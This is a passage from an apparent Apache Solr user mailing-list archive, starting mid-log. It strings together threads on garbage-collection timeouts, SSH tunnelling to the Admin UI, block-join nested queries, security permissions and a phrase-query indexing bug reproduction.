0x0005e000) concurrent mark-sweep generation total 7864320K, used 7864319K [0x0005e000, 0x0007c000, 0x0007c000) Metaspace used 53159K, capacity 54766K, committed 55148K, reserved 1097728K class spaceused 5589K, capacity 5950K, committed 6000K, reserved 1048576K } 2019-10-02T16:03:25.477+: 265328.214: Total time for which application threads were stopped: 9.5906157 seconds, Stopping threads took: 0.0001274 seconds *With the following from the SOLR log: * [ x:core] o.a.s.s.HttpSolrCall Unable to write response, client closed connection or we are s hutting down org.eclipse.jetty.io.EofException: Closed at org.eclipse.jetty.server.HttpOutput.write(HttpOutput.java:665) ~[jetty-server-9.4.14.v20181114.jar:9.4.14.v20181114] at org.apache.solr.servlet.ServletOutputStreamWrapper.write(ServletOutputStreamWrapper.java:126) ~[solr-core-7.7.2.jar:7.7.2 d4c30fc2856154f2c 1fefc589eb7cd070a415b94 - janhoy - 2019-05-28 23:37:48] at org.apache.solr.response.QueryResponseWriterUtil$1.write(QueryResponseWriterUtil.java:54) ~[solr-core-7.7.2.jar:7.7.2 d4c30fc2856154f2c1fef c589eb7cd070a415b94 - janhoy - 2019-05-28 23:37:48] at java.io.OutputStream.write(OutputStream.java:116) ~[?:1.8.0_222-ea] at sun.nio.cs.StreamEncoder.writeBytes(StreamEncoder.java:221) ~[?:1.8.0_222-ea] at sun.nio.cs.StreamEncoder.implWrite(StreamEncoder.java:282) ~[?:1.8.0_222-ea] at sun.nio.cs.StreamEncoder.write(StreamEncoder.java:125) ~[?:1.8.0_222-ea] at java.io.OutputStreamWriter.write(OutputStreamWriter.jav
Fwd: Solr standalone timeouts after upgrading to SOLR 7
Hello all, We recently moved to SOLR 7 from SOLR 6 about 2 weeks ago. Once each week (including today) we experienced query timeout issues with corresponding GC events. There was a spike in CPU up to 66% which is not something we previously saw w/ Solr 6. From the SOLR logs it looks like something inside the JVM has happend, SOLR is reporting closed connections from Jetty. Our data size is relatively small but we do run 5 cores within the one Jetty instance. There index sizes are anywhere between 200Mb to 2GB Our memory consumption is relatively low: "free":"296.1 MB", "total":"569.6 MB", "max":"9.6 GB", "used":"273.5 MB (%2.8)", We had a spike in traffic about 5 minutes prior to some longer GC events (similar situation last week). Any help would be appreciated. Below is my current system info along with a GC log snippet and the corresponding SOLR log error. *System info:* AMZ2 linux 8 core 32 GB Mem *Java:* 1.8.0_222-ea 25.222-b03 *Solr: *solr-spec-version":"7.7.2" *Start options: * "-Xms512m", "-Xmx10g", "-XX:NewRatio=3", "-XX:SurvivorRatio=4", "-XX:TargetSurvivorRatio=90", "-XX:MaxTenuringThreshold=8", "-XX:+UseConcMarkSweepGC", "-XX:ConcGCThreads=4", "-XX:ParallelGCThreads=4", "-XX:+CMSScavengeBeforeRemark", "-XX:PretenureSizeThreshold=64m", "-XX:+UseCMSInitiatingOccupancyOnly", "-XX:CMSInitiatingOccupancyFraction=50", "-XX:CMSMaxAbortablePrecleanTime=6000", "-XX:+CMSParallelRemarkEnabled", "-XX:+ParallelRefProcEnabled", "-XX:-OmitStackTraceInFastThrow", "-verbose:gc", "-XX:+PrintHeapAtGC", "-XX:+PrintGCDetails", "-XX:+PrintGCDateStamps", "-XX:+PrintGCTimeStamps", "-XX:+PrintTenuringDistribution", "-XX:+PrintGCApplicationStoppedTime", "-XX:+UseGCLogFileRotation", "-XX:NumberOfGCLogFiles=9", "-XX:GCLogFileSize=20M", "-Xss256k", "-Dsolr.log.muteconsole" Here is an example of from the GC log: 2019-10-02T16:03:15.888+: 265318.624: [Full GC (Allocation Failure) 2019-10-02T16:03:15.888+: 265318.624: [CMS2019-10-02T16:03:16.134+: 26 5318.870: [CMS-concurrent-mark: 1.773/1.783 secs] [Times: user=13.14 sys=0.00, real=1.78 secs] (concurrent mode failure): 7864319K->7864319K(7864320K), 9.5890129 secs] 10048895K->8863021K(10048896K), [Metaspace: 53159K->53159K(1097728K)], 9.5892061 secs] [Times: user=10.31 sys=0.00, real=9.59 secs] Heap after GC invocations=296656 (full 546): par new generation total 2184576K, used 998701K [0x00054000, 0x0005e000, 0x0005e000) eden space 1747712K, 57% used [0x00054000, 0x00057cf4b4f0, 0x0005aaac) from space 436864K, 0% used [0x0005aaac, 0x0005aaac, 0x0005c556) to space 436864K, 0% used [0x0005c556, 0x0005c556, 0x0005e000) concurrent mark-sweep generation total 7864320K, used 7864319K [0x0005e000, 0x0007c000, 0x0007c000) Metaspace used 53159K, capacity 54766K, committed 55148K, reserved 1097728K class spaceused 5589K, capacity 5950K, committed 6000K, reserved 1048576K } 2019-10-02T16:03:25.477+: 265328.214: Total time for which application threads were stopped: 9.5906157 seconds, Stopping threads took: 0.0001274 seconds *With the following from the SOLR log: * [ x:core] o.a.s.s.HttpSolrCall Unable to write response, client closed connection or we are s hutting down org.eclipse.jetty.io.EofException: Closed at org.eclipse.jetty.server.HttpOutput.write(HttpOutput.java:665) ~[jetty-server-9.4.14.v20181114.jar:9.4.14.v20181114] at org.apache.solr.servlet.ServletOutputStreamWrapper.write(ServletOutputStreamWrapper.java:126) ~[solr-core-7.7.2.jar:7.7.2 d4c30fc2856154f2c 1fefc589eb7cd070a415b94 - janhoy - 2019-05-28 23:37:48] at org.apache.solr.response.QueryResponseWriterUtil$1.write(QueryResponseWriterUtil.java:54) ~[solr-core-7.7.2.jar:7.7.2 d4c30fc2856154f2c1fef c589eb7cd070a415b94 - janhoy - 2019-05-28 23:37:48] at java.io.OutputStream.write(OutputStream.java:116) ~[?:1.8.0_222-ea] at sun.nio.cs.StreamEncoder.writeBytes(StreamEncoder.java:221) ~[?:1.8.0_222-ea] at sun.nio.cs.StreamEncoder.implWrite(StreamEncoder.java:282) ~[?:1.8.0_222-ea] at sun.nio.cs.StreamEncoder.write(StreamEncoder.java:125) ~[?:1.8.0_222-ea] at java.io.OutputStreamWriter.write(OutputStreamWriter.jav
How to access the Solr Admin GUI (2)
First I want to thank you for your comments. Second I'll add some background information. Here Solr is part of a complex information management project, which I developed for a customer and which includes different source databases, containing edited/imported/crawled content. This project runs on a Debian root server, which is hosted by an ISP and maintained by the ISP's support team and - a little bit - by me. This setting was required by my customer. Solr searches are created and processed on this server from a PHP MySQL stack, and port 8983 is only available internally. I agree the opening port 8983 to the public is dangerous, I've experienced that. Nevertheless from time to time I need access to the Solr Admin GUI on that server. My ISP's support team is not familiar with Solr, but willing to help. So I'll forward your comments to them and discuss with them. Thank you again. Walter Shawn Heisey schrieb am 01.01.2019 20:00:13: If you've blocked the Solr port, then you can't access Solr at all, including the admin UI. The UI is accessed through the same port as the rest of Solr. The admin UI is a static set of resources (html, css, javascript, images, etc) that gets downloaded and runs within the browser, accessing the same API that anything else would. When you issue a query with the admin UI, it is your browser that makes the query, not the server. If you set up a reverse proxy that blocks URL paths for the API while allowing URL paths for the admin UI, then the admin UI won't work -- because everything the admin UI displays or does is accomplished by your browser making calls to the API. Thanks, Shawn Terry Steichen schrieb am 01.01.2019 19:39:04: I think a better approach to tunneling would be: ssh -p -L :localhost:8983 use...@myremoteserver.example.com This requires you to set up a different port () rather than use the standard 22 port (on your router and on your sshd config). I've been running something like this for about a year and have rarely if ever had it attacked. Prior to changing the port (to ), however, I was under constant hacking attacks - they find port 22 too attractive to ignore. Also, regarding my use of port : if you have the server running on several local machines (as I do), the use of the port may help prevent confusion (as to whether your browser is accessing a local - defaulted to 8983 - or a remote solr server). Note: you might find that the ssh connection will drop out after some inactivity, and need to be restarted occasionally. Pretty simple to do - just run the ssh line above again. Note: I also add authorization controls to the AdminUI (and its functions) Jörn Franke schrieb am 01.01.2019 19:11:18: You could configure a reverse proxy to provide one or more means of authentication. However, I agree that the purpose why this is done should be clarified. Kay Wrobel schrieb am 01.01.2019 19:02:10: You can use ssh to tunnel in. ssh -L8983:localhost:8983 use...@myremoteserver.example.com This will only require port 22 to be exposed to the public. Sent from my iPhone Walter Underwood schrieb am 01.01.2019 19:00:31: Yes, exposing the admin UI on the web is very dangerous. Anyone who finds it can delete all your collections. That UI is designed for “back office” use only. wunder Walter Underwood wun...@wunderwood.org http://observer.wunderwood.org/ (my blog) Gus Heck schrieb am 01.01.2019 18:43:02: Why would you want to expose the administration gui on the web? This is a very hazardous thing to do. Never mind that it normally also runs on 8983 and all it's functionality relies on the ability to interact with 8983 hosted api end points. What are you actually trying to solve? Jörn Franke schrieb am 31.12.2018 23:07:49: Reverse proxy? "aleksander_goncha...@yahoo.de" schrieb am 31.12.2018 23:22:59: Hi Walter, hatte ähnlichen Fall. Der wurde mit Proxy gelöst. "Einfach" Ngnix dazwischen geschaltet. Viele Grüße Alexander s...@cid.is schrieb am 31.12.2018 22:48:55: Hi all, is there a way, better a solution, to access the Solr Admin GUI from outside the server (via public web) while the Solr port 8983 is closed by a firewall and only available inside the server via localhost? Thanks in advance Walter Claassen Alexandraweg 32 D 64287 Darmstadt Fon +49-6151-4937961 Fax +49-6151-4937969 c...@cid.is
How to access the Solr Admin GUI
Hi all, is there a way, better a solution, to access the Solr Admin GUI from outside the server (via public web) while the Solr port 8983 is closed by a firewall and only available inside the server via localhost? Thanks in advance Walter Claassen Alexandraweg 32 D 64287 Darmstadt Fon +49-6151-4937961 Fax +49-6151-4937969 c...@cid.is
Re: How to retrieve nested documents (parents and their children together) ?
Ah, that's what _root_ is for ! I was wondering. Thank you! On 7/25/18 2:36 PM, Mikhail Khludnev wrote: _root_:parent-id чт, 26 июля 2018, 1:33 TK Solr : The child doc transformer worked great. Thank you. In my experiment, posting 'parent-id' to the update end point only deleted the parent doc. Do I insert a complex join query from id to _version_ and delete all the docs of the matching _version_ ? On 7/24/18 9:27 PM, TK Solr wrote: Thank you. I'll try the child doc transformer. On a related question, if I delete a parent document, will its children be deleted also? Or do I have to have a parent_id field in each child so that the child docs can be deleted? On 7/22/18 10:05 AM, Mikhail Khludnev wrote: Hello, Check [child] https://lucene.apache.org/solr/guide/7_4/transforming-result-documents.html#child-childdoctransformerfactory or [subquery]. Although, it's worth to put reference to it somewhere in blockjoin qparsers. Documentation patches are welcome. On Sun, Jul 22, 2018 at 10:25 AM TK Solr wrote: https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser talks about {!parent which=} child docs>, which returns parent docs only, and {!child of=} docs>, which returns child docs only. Is there a way to retrieve the matched documents in the original, nested form? Using the sample document, is there way to get: 1 Solr has block join support parentDocument 2 SolrCloud supports it too! rather than just the parent or the child docs?
Re: How to retrieve nested documents (parents and their children together) ?
The child doc transformer worked great. Thank you. In my experiment, posting 'parent-id' to the update end point only deleted the parent doc. Do I insert a complex join query from id to _version_ and delete all the docs of the matching _version_ ? On 7/24/18 9:27 PM, TK Solr wrote: Thank you. I'll try the child doc transformer. On a related question, if I delete a parent document, will its children be deleted also? Or do I have to have a parent_id field in each child so that the child docs can be deleted? On 7/22/18 10:05 AM, Mikhail Khludnev wrote: Hello, Check [child] https://lucene.apache.org/solr/guide/7_4/transforming-result-documents.html#child-childdoctransformerfactory or [subquery]. Although, it's worth to put reference to it somewhere in blockjoin qparsers. Documentation patches are welcome. On Sun, Jul 22, 2018 at 10:25 AM TK Solr wrote: https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser talks about {!parent which=} , which returns parent docs only, and {!child of=} , which returns child docs only. Is there a way to retrieve the matched documents in the original, nested form? Using the sample document, is there way to get: 1 Solr has block join support parentDocument 2 SolrCloud supports it too! rather than just the parent or the child docs?
Re: How to retrieve nested documents (parents and their children together) ?
Thank you. I'll try the child doc transformer. On a related question, if I delete a parent document, will its children be deleted also? Or do I have to have a parent_id field in each child so that the child docs can be deleted? On 7/22/18 10:05 AM, Mikhail Khludnev wrote: Hello, Check [child] https://lucene.apache.org/solr/guide/7_4/transforming-result-documents.html#child-childdoctransformerfactory or [subquery]. Although, it's worth to put reference to it somewhere in blockjoin qparsers. Documentation patches are welcome. On Sun, Jul 22, 2018 at 10:25 AM TK Solr wrote: https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser talks about {!parent which=} , which returns parent docs only, and {!child of=} , which returns child docs only. Is there a way to retrieve the matched documents in the original, nested form? Using the sample document, is there way to get: 1 Solr has block join support parentDocument 2 SolrCloud supports it too! rather than just the parent or the child docs?
How to retrieve nested documents (parents and their children together) ?
https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser talks about {!parent which=} docs>, which returns parent docs only, and {!child of=} , which returns child docs only. Is there a way to retrieve the matched documents in the original, nested form? Using the sample document, is there way to get: 1 Solr has block join support parentDocument 2 SolrCloud supports it too! rather than just the parent or the child docs?
Re: Parent-child query; subqueries on child docs of the same set of fields
Mikhail, Actually, your suggestion worked! I was making a typo on the field name. Thank you very much! TK p.s. I have found a mention of _query_ "magic field" in the Solr Reference Guide On 7/8/18 11:04 AM, TK Solr wrote: Thank you. This is more promising because I see the second clause in parsedquery. But it is hitting zero document. The debug query output looks like this. explain is empty: rawquerystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre AND attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" v='attrname:country AND attrvalue:USA'}", "querystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre AND attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" v='attrname:country AND attrvalue:USA'}", "parsedquery":"+AllParentsAware(ToParentBlockJoinQuery (+(+attrname:genre +attrvalue:drama))) +AllParentsAware(ToParentBlockJoinQuery (+(+attrname:country +attrvalue:usa)))", "parsedquery_toString":"+ToParentBlockJoinQuery (+(+attrname:genre +attrvalue:drama)) +ToParentBlockJoinQuery (+(+attrname:country +attrvalue:usa))", "explain":{}, "QParser":"LuceneQParser", "timing":{...} Could you tell me what _query_ does? On 7/4/18 10:25 PM, Mikhail Khludnev wrote: agh... It's my pet peeve. what about q= {!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} AND {!parent which="isParent:true" v='attrname:country AND attrvalue:USA'} ^leading space q=_query_:{!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} AND _query_:{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'} q=+{!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} +{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'} Beware of escape encoding. it might require to replace + to %2b. Post debug=query response here. On Tue, Jul 3, 2018 at 9:25 PM TK Solr wrote: Thank you, Mikhail. But this didn't work. The first {!parent which='...' v='...'} alone works. But the second {!parent ...} clause is completely ignored. In fact, if I turn on debugQuery, rawquerystring and querystring have the second query but parsedquery and parsedquery_toString only have the first query. BTW, does is the v parameter works in place of the query following {!parsername } for any parser? On 7/3/18 12:42 PM, Mikhail Khludnev wrote: q={!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} AND {!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}
Re: Parent-child query; subqueries on child docs of the same set of fields
Thank you. This is more promising because I see the second clause in parsedquery. But it is hitting zero document. The debug query output looks like this. explain is empty: rawquerystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre AND attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" v='attrname:country AND attrvalue:USA'}", "querystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre AND attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" v='attrname:country AND attrvalue:USA'}", "parsedquery":"+AllParentsAware(ToParentBlockJoinQuery (+(+attrname:genre +attrvalue:drama))) +AllParentsAware(ToParentBlockJoinQuery (+(+attrname:country +attrvalue:usa)))", "parsedquery_toString":"+ToParentBlockJoinQuery (+(+attrname:genre +attrvalue:drama)) +ToParentBlockJoinQuery (+(+attrname:country +attrvalue:usa))", "explain":{}, "QParser":"LuceneQParser", "timing":{...} Could you tell me what _query_ does? On 7/4/18 10:25 PM, Mikhail Khludnev wrote: agh... It's my pet peeve. what about q= {!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} AND {!parent which="isParent:true" v='attrname:country AND attrvalue:USA'} ^leading space q=_query_:{!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} AND _query_:{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'} q=+{!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} +{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'} Beware of escape encoding. it might require to replace + to %2b. Post debug=query response here. On Tue, Jul 3, 2018 at 9:25 PM TK Solr wrote: Thank you, Mikhail. But this didn't work. The first {!parent which='...' v='...'} alone works. But the second {!parent ...} clause is completely ignored. In fact, if I turn on debugQuery, rawquerystring and querystring have the second query but parsedquery and parsedquery_toString only have the first query. BTW, does is the v parameter works in place of the query following {!parsername } for any parser? On 7/3/18 12:42 PM, Mikhail Khludnev wrote: q={!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} AND {!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}
Re: Parent-child query; subqueries on child docs of the same set of fields
Thank you, Mikhail. But this didn't work. The first {!parent which='...' v='...'} alone works. But the second {!parent ...} clause is completely ignored. In fact, if I turn on debugQuery, rawquerystring and querystring have the second query but parsedquery and parsedquery_toString only have the first query. BTW, does is the v parameter works in place of the query following {!parsername } for any parser? On 7/3/18 12:42 PM, Mikhail Khludnev wrote: q={!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} AND {!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}
Parent-child query; subqueries on child docs of the same set of fields
I have a document with child documents like: maindoc_121 true child_121_1 genre drama child_121_2 country USA The child documents have the same set of fields. I can write a query that has a child which has attrname=genre and attrvalue=drama as q={!parent which="isParent:true"} attrname:genre AND attrvalue:drama But if I want to add another condition that the parent must have another child that have certain values, what do I do? q={!parent which="isParent:true"} attrname:genre AND attrvalue:drama AND attrname:country AND attrvalue:USA would mean a query of parent where one of the children must match. I want a parent that have two children, one is matched by one sub-query, and another is matched by another sub-query. TK
Re: Windows monitoring software for Solr recommendation
On 6/5/18 10:31 AM, Christopher Schultz wrote: How about Apache procrun/commons-daemon? https://commons.apache.org/proper/commons-daemon/procrun.html Thank you, I'll take a look. On 6/5/18 1:51 PM, Shawn Heisey wrote: The best bet for an easy service install is probably NSSM. It's got a name that some people hate, but a lot of people use it successfully. https://nssm.cc/ Thank you, I'll take a look at this one too. You mentioned looking at a GC log. Can you provide that entire log for analysis? Thank you for your offer to help. But I don't really think this is a memory related issue. I visualized the GC log with GCMV (GCVM?) and the graph shows Solr was using less than half of the heap space at the peak. This Solr doesn't get much query traffic and no indexing was running. It's really a sudden death of JVM with no trace. The only concern I have is that the Solr config files are that of Solr 5.x and they just upgraded to Solr 6.6. But I understand Solr 6 supports Solr 5 compatible mode. Has there been any issue in the compatibility mode? TK
Windows monitoring software for Solr recommendation
My client's Solr 6.6 running on a Windows server is mysteriously crashing without any JVM crash log. No unusual activities recorded in solr.log. GC log does not indicate the OOM situation. It's a simple single-core, single node deployment (no solrCloud). It has very light load. No indexing activities were running near the crash time. After exhausting all possibilities (suggestions are welcome), I'd like to recommend to install some monitoring software but I couldn't find one that works on Windows for a Java based software. (Some I found can monitor only EXEs. Since all java software shares the same EXE, java.EXE, those won't work.) Can anyone recommend some? They don't need to be free but can't be very expensive since it's a very lightly used Solr system. Perhaps less than $500? TK
Re: Run solr server using Java program
The solr.cmd starts Solr by running java -jar start.jar, which has the MANIFEST file that tells the java command that it's main class is org.eclipse.jetty.start.Main. So, I would think your Java program should be able to start Solr (jetty, really) by calling org.exlipse.jetty.start.Main.main(argv). But a big question is why you'd like to do that. TK On 4/18/18 7:34 AM, rameshkjes wrote: Hi guys, I am able to run the solr instance, add the core and import the data manually. But I want to do everything with the help of Java program, I searched a lot but did not find any relevant answer. In order to run the solr server, i execute following command inside directory: D:\software\solr-7.2.0\solr-7.2.0\bin " /solr.cmd -s "C:\Users\lucky\github\myproject\solr-config"/ " After that I access to " /http://localhost:8983/solr// " and select the name of core which is "demo" and then I select/ dataimport/ tab and "/execute/" to import documents. First thing what i tried is to run the solr server using Java program, which I am unable to do. Could anyone please with that? I am using Solr 7.2.0 Thanks -- Sent from: http://lucene.472066.n3.nabble.com/Solr-User-f472068.html
Minimum memory requirement
On my AWS t2.micro instance, which only has 1 GB memory, I installed Solr (4.7.1 - please don't ask) and tried to run it in sample directory as java -jar start.jar. It exited shortly due to lack of memory. How much memory does Solr require to run, with empty core? TK
literal.* use in posting PDF files
I have a schema.xml defined to require two fields, "id" and "libDocumentID". solrconfig.xml is the standard one. Using curl, I tried posting a PDF file like this: curl 'http://localhost:8983/solr/update/extract?literal.id=foodf=foo=true' -F "myfile=@foo.pdf" but I got: [doc=foo.pdf] missing required field: libDocumentID400 Can I specify more than one litera.name=value ? Do I have to define literal.libDocumentID in solrconfig.xml? I'm using Solr 5.3.1 (please don't ask...). TK
Bitnami, or other Solr on AWS recommendations?
If I want to deploy Solr on AWS, do people recommend using the prepackaged Bitnami Solr image? Or is it better to install Solr manually on a computer instance? Or are there a better way? TK
Re: Extended characters
I think you can use ASCIIFoldingFIlter http://lucene.apache.org/core/6_2_0/analyzers-common/org/apache/lucene/analysis/miscellaneous/ASCIIFoldingFilter.html by inserting its factory in your schema. http://lucene.apache.org/core/6_2_0/analyzers-common/org/apache/lucene/analysis/miscellaneous/ASCIIFoldingFilterFactory.html I would suggest making a separate field for this so that exact match can be boosted. On 10/29/17 10:56 AM, Robert Brown wrote: Hi, I have a text field in my index containing extended characters, which I'd like to match against when searching without the extended characters. e.g. field contains "Ensō" which I want to match when searching for just "enso". My current config for that field (type) is given below: autoGeneratePhraseQueries="true"> synonyms="index_synonyms.txt" ignoreCase="true" expand="true" /> words="lang/stopwords_en.txt" /> words="lang/stopwords_en.txt" /> Kuro
Re: Work-around for "indexed without position data"
Not sure if it helps beyond the steps to reproduce that I supplied above, but I also see that "Omit Term Frequencies & Positions" is still set on the field according to the LukeRequestHandler: ITS--OF-- On Mon, Jun 5, 2017 at 1:18 PM, Solr User <solr...@gmail.com> wrote: > Sorry for the delay. I was able to reproduce this easily with my setup, > but reproducing this on a Solr example proved challenging. Hopefully the > work that I did to find the situation in which this is produced will help > in resolving the problem. The driving factor for this appears to be how > updates are sent to Solr. When sending batches of updates with commits, > the problem is reproduced. If the commit is held until after all updates > are sent, then no problem is produced. This leads me to believe that this > issue has something to do with overlapping commits or index merges. This > was reproducible regardless of running classic or managed schema and > regardless of running Solr core or SolrCloud. > > There are not many steps to reproduce this, but you will need a way to > send these updates. I have included inline create.sh and create.pl > scripts to generate the data and send the updates. You can index a > lastModified field or something to convince yourself that everything has > been re-indexed. I left that out to keep the steps lean. Also, this test > is using commit statements from the client sending the updates for > simplicity even though it is not a good practice. My normal setup is using > Solrj with commitWithin to allow Solr to manage when the commits take > place, but the same error is produced either way. > > > *STEPS TO REPRODUCE* > >1. Install Solr 5.5.3 and change to that working directory >2. bin/solr -e techproducts >3. bin/solr stop [Why these next 3 steps? These are to start the >index completely new without the 32 example documents as opposed to a >delete query. The documents are not posted after the core is detected the >second time.] >4. rm -rf ./example/techproducts/solr/techproducts/data/ >5. bin/solr -e techproducts >6. ./create.sh >7. curl -X POST -H 'Content-type:application/json' --data-binary '{ >"replace-field":{ "name":"cat", "type":"text_en_splitting", "indexed":true, >"multiValued":true, "stored":true } }' http://localhost:8983/solr/ >techproducts/schema >8. http://localhost:8983/solr/techproducts/select?q=cat:% >22hard%20drive%22 [error] >9. ./create.sh >10. http://localhost:8983/solr/techproducts/select?q=cat:% >22hard%20drive%22 [error even though all documents have been >re-indexed] > > *create.sh* > #!/bin/bash > for i in {1..100}; do > echo "$i" > ./create.pl $i > ./create.xml$i > curl http://localhost:8983/solr/techproducts/update?commit=true -H > "Content-Type: text/xml" --data-binary @./create.xml$i > done > > *create.pl <http://create.pl>* > #!/usr/bin/perl > my $S = $ARGV[0]; > my $I = 100; > my $N = $S*$I + $I; > my $i; > print "\n"; > for($i=$S*$I; $i<$N; $i++) { >print "SP${i}cat > hard drive ${i}\n"; > } > print "\n"; > > > On Fri, May 26, 2017 at 2:14 AM, Rick Leir <rl...@leirtech.com> wrote: > >> Can you reproduce this error? What are the steps you take to reproduce >> it? ( simple is better). >> >> cheers -- Rick >> >> >> >> On 2017-05-25 05:46 PM, Solr User wrote: >> >>> This is in regards to changing a field type from string to >>> text_en_splitting, re-indexing all documents, even optimizing to give the >>> index a chance to merge segments and rewrite itself entirely, and then >>> getting this error when running a phrase query: >>> java.lang.IllegalStateException: field "blah" was indexed without >>> position >>> data; cannot run PhraseQuery >>> >>> I have encountered this issue before and have always done one of the >>> following as a work-around: >>> 1. Instead of changing the field type on an existing field just create a >>> new field and retire the old one. >>> 2. Delete the index directory and start from scratch. >>> >>> These work-arounds are not always ideal. Does anyone know what is >>> holding >>> onto that old field type definition? What thinks it is still a string? >>> Every document has been re-indexed and I am sure of this because I have a >>> time stamp indexed. Is there any other way to get this to work? >>> >>> For what it is worth, I am running this in SolrCloud mode but I remember >>> seeing this issue before SolrCloud was released as well. >>> >>> >> >
Re: Anonymous Read?
Thanks! The null role value did the trick. I tried this with the predefined permissions and it worked as well. Thanks again! On Tue, Jun 6, 2017 at 2:08 PM, Oakley, Craig (NIH/NLM/NCBI) [C] < craig.oak...@nih.gov> wrote: > We usually end security.json with the permissions > >{ > "name":"open_select", > "path":"/select/*", > "role":null}, > { > "name":"all-admin", > "collection":null, > "path":"/*", > "role":"allgen"}, > { > "name":"all-core-handlers", > "path":"/*", > "role":"allgen"}] > } } > > > ...and then assign the "allgen" role to all users > > This allows a select without a login & password, but requires a login & > password for anything else (including the front page of the GUI) > > -Original Message- > From: Solr User [mailto:solr...@gmail.com] > Sent: Tuesday, June 06, 2017 2:27 PM > To: solr-user@lucene.apache.org > Subject: Anonymous Read? > > Is it possible to setup Solr security to allow anonymous query (/select > etc.) but restricted access to other permissions as described in > https://lucidworks.com/2015/08/17/securing-solr-basic- > auth-permission-rules/ > ? >
Anonymous Read?
Is it possible to setup Solr security to allow anonymous query (/select etc.) but restricted access to other permissions as described in https://lucidworks.com/2015/08/17/securing-solr-basic-auth-permission-rules/ ?
Re: Work-around for "indexed without position data"
Sorry for the delay. I was able to reproduce this easily with my setup, but reproducing this on a Solr example proved challenging. Hopefully the work that I did to find the situation in which this is produced will help in resolving the problem. The driving factor for this appears to be how updates are sent to Solr. When sending batches of updates with commits, the problem is reproduced. If the commit is held until after all updates are sent, then no problem is produced. This leads me to believe that this issue has something to do with overlapping commits or index merges. This was reproducible regardless of running classic or managed schema and regardless of running Solr core or SolrCloud. There are not many steps to reproduce this, but you will need a way to send these updates. I have included inline create.sh and create.pl scripts to generate the data and send the updates. You can index a lastModified field or something to convince yourself that everything has been re-indexed. I left that out to keep the steps lean. Also, this test is using commit statements from the client sending the updates for simplicity even though it is not a good practice. My normal setup is using Solrj with commitWithin to allow Solr to manage when the commits take place, but the same error is produced either way. *STEPS TO REPRODUCE* 1. Install Solr 5.5.3 and change to that working directory 2. bin/solr -e techproducts 3. bin/solr stop [Why these next 3 steps? These are to start the index completely new without the 32 example documents as opposed to a delete query. The documents are not posted after the core is detected the second time.] 4. rm -rf ./example/techproducts/solr/techproducts/data/ 5. bin/solr -e techproducts 6. ./create.sh 7. curl -X POST -H 'Content-type:application/json' --data-binary '{ "replace-field":{ "name":"cat", "type":"text_en_splitting", "indexed":true, "multiValued":true, "stored":true } }' http://localhost:8983/solr/techproducts/schema 8. http://localhost:8983/solr/techproducts/select?q=cat:%22hard%20drive%22 [error] 9. ./create.sh 10. http://localhost:8983/solr/techproducts/select?q=cat:%22hard%20drive%22 [error even though all documents have been re-indexed] *create.sh* #!/bin/bash for i in {1..100}; do echo "$i" ./create.pl $i > ./create.xml$i curl http://localhost:8983/solr/techproducts/update?commit=true -H "Content-Type: text/xml" --data-binary @./create.xml$i done *create.pl <http://create.pl>* #!/usr/bin/perl my $S = $ARGV[0]; my $I = 100; my $N = $S*$I + $I; my $i; print "\n"; for($i=$S*$I; $i<$N; $i++) { print "SP${i}cat hard drive ${i}\n"; } print "\n"; On Fri, May 26, 2017 at 2:14 AM, Rick Leir <rl...@leirtech.com> wrote: > Can you reproduce this error? What are the steps you take to reproduce it? > ( simple is better). > > cheers -- Rick > > > > On 2017-05-25 05:46 PM, Solr User wrote: > >> This is in regards to changing a field type from string to >> text_en_splitting, re-indexing all documents, even optimizing to give the >> index a chance to merge segments and rewrite itself entirely, and then >> getting this error when running a phrase query: >> java.lang.IllegalStateException: field "blah" was indexed without >> position >> data; cannot run PhraseQuery >> >> I have encountered this issue before and have always done one of the >> following as a work-around: >> 1. Instead of changing the field type on an existing field just create a >> new field and retire the old one. >> 2. Delete the index directory and start from scratch. >> >> These work-arounds are not always ideal. Does anyone know what is holding >> onto that old field type definition? What thinks it is still a string? >> Every document has been re-indexed and I am sure of this because I have a >> time stamp indexed. Is there any other way to get this to work? >> >> For what it is worth, I am running this in SolrCloud mode but I remember >> seeing this issue before SolrCloud was released as well. >> >> >
Work-around for "indexed without position data"
This is in regards to changing a field type from string to text_en_splitting, re-indexing all documents, even optimizing to give the index a chance to merge segments and rewrite itself entirely, and then getting this error when running a phrase query: java.lang.IllegalStateException: field "blah" was indexed without position data; cannot run PhraseQuery I have encountered this issue before and have always done one of the following as a work-around: 1. Instead of changing the field type on an existing field just create a new field and retire the old one. 2. Delete the index directory and start from scratch. These work-arounds are not always ideal. Does anyone know what is holding onto that old field type definition? What thinks it is still a string? Every document has been re-indexed and I am sure of this because I have a time stamp indexed. Is there any other way to get this to work? For what it is worth, I am running this in SolrCloud mode but I remember seeing this issue before SolrCloud was released as well.
Re: Faceting and Grouping Performance Degradation in Solr 5
